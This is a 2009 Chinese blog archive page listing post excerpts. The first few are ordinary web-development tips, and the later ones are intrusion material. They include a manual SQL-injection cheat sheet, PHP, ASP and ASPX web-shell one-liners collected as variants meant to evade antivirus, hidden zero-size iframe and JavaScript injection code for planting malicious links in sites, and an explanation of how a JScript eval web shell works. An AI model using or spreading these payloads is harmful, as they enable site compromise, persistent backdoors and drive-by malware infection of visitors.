2009年11月29日

js加密方法

摘要: 做网站最让人烦恼的是自己辛辛苦苦写出来的客户端IE运行的JAVASCRIPT代码常常被别人轻易的拷贝,实在让自己的心里有点不是滋味,要知道自己写点东西也挺累的.但我们也应该清楚地认识到因为JAVASCRIPT代码是在IE中解释执行,要想绝对的保密是不可能的,我们要做的就是尽可能的增大拷贝者复制的难度,让他知难而退(但愿~!~),下面我结合自己这几年来的实践,及个人研究的心得,和大家一起来探讨一下网... 阅读全文

posted @ 2009-11-29 17:04 萧木柯 阅读(11176) 评论(0) 推荐(0) 编辑

2009年9月24日

随机变换颜色的图片边框

摘要: <style>body img{border:1px solid white}</style><script language="JavaScript">var color;var ifunction change(i){var a=Math.random()*255;var b=Math.random()*255;var c=Math.random()*255... 阅读全文

posted @ 2009-09-24 12:33 萧木柯 阅读(230) 评论(0) 推荐(0) 编辑

2009年9月22日

让LI标签自动宽度自动换行

摘要: 用到li标签,要自动宽度,因为无法预计里面的text的长度,如果固定宽度,又浪费很多空白。但是死活就是出错,英文没问题,中文就不行:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htm... 阅读全文

posted @ 2009-09-22 21:40 萧木柯 阅读(30524) 评论(0) 推荐(1) 编辑

2009年6月16日

为何js函数中使用return后表单仍旧提交了

摘要: 刚才做一个表单提交的时候,发现return后照样提交了,但是原来的程序是没问题的,后来改成了另一个提交表单就出现这种问题了,反复测试和排除,最终终于锁定了问题。。。。。。靠!!!!!!!!!竟然是图片按钮在js事件中不受return的限制,照样会提交,而button就不会。解决办法:查了相应函数后得知,在return之前加以下一句就好了:event.returnValue=false;<in... 阅读全文

posted @ 2009-06-16 13:43 萧木柯 阅读(1692) 评论(0) 推荐(0) 编辑

2009年5月28日

超简单---鼠标滑过变换图片

摘要: 鼠标滑过,图片变换,非常实用,用JS可以很容易做到,但是JS完成后有个缺陷,在滑过的时候,第一次可能是空白的,然后才显示,因为要下载图片,网速慢的时候更加明显。其实用CSS实现更容易,而且不会出现上面的短暂显示空白的小问题。 CSS实现例子:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w... 阅读全文

posted @ 2009-05-28 20:07 萧木柯 阅读(9028) 评论(5) 推荐(0) 编辑

2009年5月27日

手工注入精华

摘要: 1.判断是否有注入;and1=1;and1=2 2.初步判断是否是mssql;anduser>0 3.注入参数是字符’and[查询条件]and’’=’ 4.搜索时没过滤参数的’and[查询条件]and’%25’=’ 5.判断数据库系统 ;and(selectcount(*)fromsysobjec... 阅读全文

posted @ 2009-05-27 10:57 萧木柯 阅读(212) 评论(0) 推荐(0) 编辑

2009年5月15日

一句话木马的变形写法

摘要: 一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。但是正是因为它短小精悍,所以目标特征也很明显,非常容易被杀软等过滤和杀掉,网上目前有些变种,现收集了一些,供收藏。asp一句话<%execute(request("1"))%>php一句话<?php eval($_POST[1]);?>aspx一句话<script language="C#" ... 阅读全文

posted @ 2009-05-15 11:14 萧木柯 阅读(5386) 评论(0) 推荐(0) 编辑

2009年5月11日

挂马代码大全

摘要: 一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=jav... 阅读全文

posted @ 2009-05-11 12:34 萧木柯 阅读(331) 评论(0) 推荐(0) 编辑

一句话木马的原理

摘要: 2009年02月21日 星期六 15:16一句话木马:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>来解释下它的原理首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属... 阅读全文

posted @ 2009-05-11 12:31 萧木柯 阅读(670) 评论(0) 推荐(0) 编辑

网马扫盲

摘要: 当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷, 形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的 病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来... 阅读全文

posted @ 2009-05-11 12:22 萧木柯 阅读(347) 评论(0) 推荐(0) 编辑